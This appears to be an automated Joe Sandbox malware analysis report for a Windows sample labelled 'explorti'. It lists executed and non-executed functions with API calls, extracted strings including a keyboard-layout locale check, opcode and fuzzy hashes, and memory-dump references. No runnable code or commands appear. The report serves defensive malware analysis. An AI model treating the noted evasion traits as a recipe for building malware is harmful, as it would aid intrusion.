Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$\s**
API String ID: 0-2026514013
Opcode ID: eccdfc02e4e1db8c0d9ed93138f169defab291e44138efd16b011fed4eae9dbc
Instruction ID: a22055c0d32a18442f53b4b757f2cd6a5a2b42fbb3225ba15fab94d102cc65d4
Opcode Fuzzy Hash: eccdfc02e4e1db8c0d9ed93138f169defab291e44138efd16b011fed4eae9dbc
Instruction Fuzzy Hash: 29E17F71900268ABDB24DF94CD8DBDDB779AB04304F5042D9E509A7292E7789FC4CF91

Function 00717D00 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00717EA3

Strings

HlusMa==, xrefs: 0071810A
\s**, xrefs: 00717D2B
HlurOK==, xrefs: 00718062
HlurNa==, xrefs: 007181B2

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==$\s**
API String ID: 1721193555-427726990
Opcode ID: 83b2aec6415e7200ba5c2d34abede1aa998aa72c5fe460f61248c95e7ad2abd6
Instruction ID: 21528c6779404e5a9234f684265b656d2793ad562667ca42f8421b2fab6c11be
Opcode Fuzzy Hash: 83b2aec6415e7200ba5c2d34abede1aa998aa72c5fe460f61248c95e7ad2abd6
Instruction Fuzzy Hash: 3BD1D571E04614DBDF28AB2CDD4A3ED7772AB82310F544288E4196B2C2DB3D5EC58BD2

Function 00746E01 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00746E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00746E7D
__dosmaperr.LIBCMT ref: 00746F12

Part of subcall function 00747177: __dosmaperr.LIBCMT ref: 007471AC

Strings

\s**, xrefs: 00746E09

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID: \s**
API String ID: 2531987475-1123597553
Opcode ID: a5ef44ee484c456449a48e34b674b8e10b39d02a31db01a20d50f214de364ad4
Instruction ID: 69fef7c911a1ce681176804a80a9b69539772f233596c31baaeda9580f4fa42d
Opcode Fuzzy Hash: a5ef44ee484c456449a48e34b674b8e10b39d02a31db01a20d50f214de364ad4
Instruction Fuzzy Hash: 51415E76900648EBDB24EFB5EC459AFB7F9EF89300B10452DF496D3611EB389944CB21

Function 007182B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00718454

Strings

\s**, xrefs: 007182DB

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: \s**
API String ID: 1721193555-1123597553
Opcode ID: cbcdd5ab23249aaadc7ab0ad641e15e39211a103101f09881c4e690ddc4c8344
Instruction ID: 1aa80a85224905d86c69ab8ee8f2748fa0b75a1d213679dc7650f92f540e4f37
Opcode Fuzzy Hash: cbcdd5ab23249aaadc7ab0ad641e15e39211a103101f09881c4e690ddc4c8344
Instruction Fuzzy Hash: 6A510771D00258DBEB24EF28DD49BEDB775DB45310F504299EC14A72C1EF789AC08B92

Function 00746F71 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00746FB3

Strings

\s**, xrefs: 00746F79

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID: \s**
API String ID: 2574697306-1123597553
Opcode ID: fe9c750f0f680efddb78105352534af7749748f6e46cf7e29397eb961ed9f60d
Instruction ID: 7973259063fb5c4e090ac15c8b40f0cd115243a1a74a72ac0ca7a50c527e5690
Opcode Fuzzy Hash: fe9c750f0f680efddb78105352534af7749748f6e46cf7e29397eb961ed9f60d
Instruction Fuzzy Hash: 54112EB690020CABCB00DED4D944EDFB7BCAF09310F505266E556E2180EB34EB48CB62

Function 00726AE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00726B65

Strings

\s**, xrefs: 007246D4, 00724EFB, 00726AF6

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: \s**
API String ID: 3472027048-1123597553
Opcode ID: ad7a7a9d36bb89db0bf7f5130a074991ae5698cdcfd7dbf6b85754d77fa7a178
Instruction ID: b18edda42aa4f110c7b16b8e94fe23c4ca096699d7a44afccd434b2f20194a18
Opcode Fuzzy Hash: ad7a7a9d36bb89db0bf7f5130a074991ae5698cdcfd7dbf6b85754d77fa7a178
Instruction Fuzzy Hash: 28F0F9B1E00614EBC7147B6CDD0B75D7B75A746760F904358E825672E2EA7C590087D2

Function 00746C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70e3a62f70276bd54806d7452f2b4cc57487cab4de9261ce68922ede28bd605
Instruction ID: 4df48d63e55c87df02065d03011b7eaf9a6fdc88b78ddd9a7953954a3290b930
Opcode Fuzzy Hash: d70e3a62f70276bd54806d7452f2b4cc57487cab4de9261ce68922ede28bd605
Instruction Fuzzy Hash: D721F872F05208BAEF117B689C46BAE37299F42778F204350F9243B1D1DB785E05D6A2

Function 05100DF4 Relevance: .1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2893116820.0000000005100000.00000040.00001000.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5100000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14203ef2eba14c44a52b3fd9f4eb81bd5ef7666dc70bb7714d0bd025197d240f
Instruction ID: 5dc5b62c4207723c1137428853e8a31297e04b47dd8b9a51125aab876305b4e6
Opcode Fuzzy Hash: 14203ef2eba14c44a52b3fd9f4eb81bd5ef7666dc70bb7714d0bd025197d240f
Instruction Fuzzy Hash: 7601D4FF14C111AD7155D1927B1DBF76B2ED1DF6303B29827F447D0982E2C85A8A1271

Function 05100DEF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2893116820.0000000005100000.00000040.00001000.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5100000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c646d777f0a72e57fed7907097b6593326cff3a479d249f3bd74dbe32f4be1e
Instruction ID: 6267628dc398f4611492a1fd89ce8eedae6824a1d698f7c7c32c26faa85b3c26
Opcode Fuzzy Hash: 0c646d777f0a72e57fed7907097b6593326cff3a479d249f3bd74dbe32f4be1e
Instruction Fuzzy Hash: F3E0A5FB15C1117D7155D1827B18ABB576EE1DE6303B2982BF407E4486E2C90B992136

Non-executed Functions

Function 0071E440 Relevance: 15.9, Strings: 12, Instructions: 878COMMON

Download Yara Rule

Strings

UVu=, xrefs: 007204DA
UFy=, xrefs: 0071F62D, 0071F90A
0657d1, xrefs: 0071FA9E
\s**, xrefs: 0071E457, 0071E9FA, 0071F604, 0071F8E5, 0071FA87
246122658369, xrefs: 0071F647, 0071F924, 007204F7
111, xrefs: 0071F6B0
KS==, xrefs: 0071E4A5
SC==, xrefs: 0071EA1F, 0071EC66
#, xrefs: 00720534
KIG+, xrefs: 0071E734
d4w, xrefs: 0071F6D5
EpPoaRV1, xrefs: 0071E47F

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$\s**$d4w
API String ID: 0-1065856810
Opcode ID: f972f9f413dbb81c8bb56ddbad1b213f83b51886e1deb2adeb37314768ece99f
Instruction ID: 3f34b8bf2454a683639e0e0dbedc303a6e522a9bf79feb41ba4f7e23a1550533
Opcode Fuzzy Hash: f972f9f413dbb81c8bb56ddbad1b213f83b51886e1deb2adeb37314768ece99f
Instruction Fuzzy Hash: CB72C570A04248DBEF18EF68C9497DD7BB6AF45304F508198E815673C2D77D9A88CBD2

Function 00753068 Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 007531E3

Strings

1#IND, xrefs: 00754373
\s**, xrefs: 00753073
1#QNAN, xrefs: 00754381
1#INF, xrefs: 0075439E
1#SNAN, xrefs: 0075437A

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$\s**
API String ID: 4168288129-362072791
Opcode ID: 1076ad6f93b8f0b6f0af90585741485b56de7404c414533c950d4faa614f3f75
Instruction ID: 7d7255d0c43c4960752cf9b1df69e957d75ddea703bcf593be6c03b3ff33ac20
Opcode Fuzzy Hash: 1076ad6f93b8f0b6f0af90585741485b56de7404c414533c950d4faa614f3f75
Instruction Fuzzy Hash: 98C24C71E046288FDB25CF28DD447E9B3B5EB48346F1441EAD84DE7250E7B9AE898F40

Function 00752BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: c723d02971c3ec83adad3c9866ec57a5015692cea7ab5a48009fd282e40c354d
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: B0F17071E002199FDF14CFA8D8806EEB7B1FF49315F15826AD819A7381D775AE06CB90

Function 0072D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0071247E

Strings

'krd+w, xrefs: 0072D324, 0072DCA4
'krd+w, xrefs: 0072DCEC

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'krd+w$'krd+w
API String ID: 2659868963-3112858790
Opcode ID: 9f8680eeb1479cd0da5081ad62b52b90df924368ace868edd03c41046a2b37e0
Instruction ID: 9c57a3726c3ebf708687fb3a059f6ea4c03a667ea875508c05e7cfc9c59e292c
Opcode Fuzzy Hash: 9f8680eeb1479cd0da5081ad62b52b90df924368ace868edd03c41046a2b37e0
Instruction Fuzzy Hash: 71518DB1A00615CFEB25CF54E8856ADBBF4FB08350F24C56AD409EB291D778AD81CF54

Function 0072CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0072CE82,?,?,?,?,0072CEB7,?,?,?,?,?,?,0072C42D,?,00000001), ref: 0072CB33

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 8b7527188b2630334902ef2200ad2d0d08147092067ff6e14523fbb8a1279d35
Instruction ID: dbf8f42fd309effdb5a928ee92adbefc62c7e351731a08a1932271dfc5e57b4f
Opcode Fuzzy Hash: 8b7527188b2630334902ef2200ad2d0d08147092067ff6e14523fbb8a1279d35
Instruction Fuzzy Hash: 92D022326022389BCA022B90BC098EEBB089F00F603004111EC09639208AE85C508BD8

Function 00747D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00747EFF

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 0af70f86a8d9440814af35bc99dea92d9a98bafe995495b4813aabe1e56cd312
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: FA518970B1C6589BDF3C8A3888DA7BE679A9F51300F140A5DD442EB682CB1DDD49C752

Function 00714AF0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

\s**, xrefs: 00714AF9

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
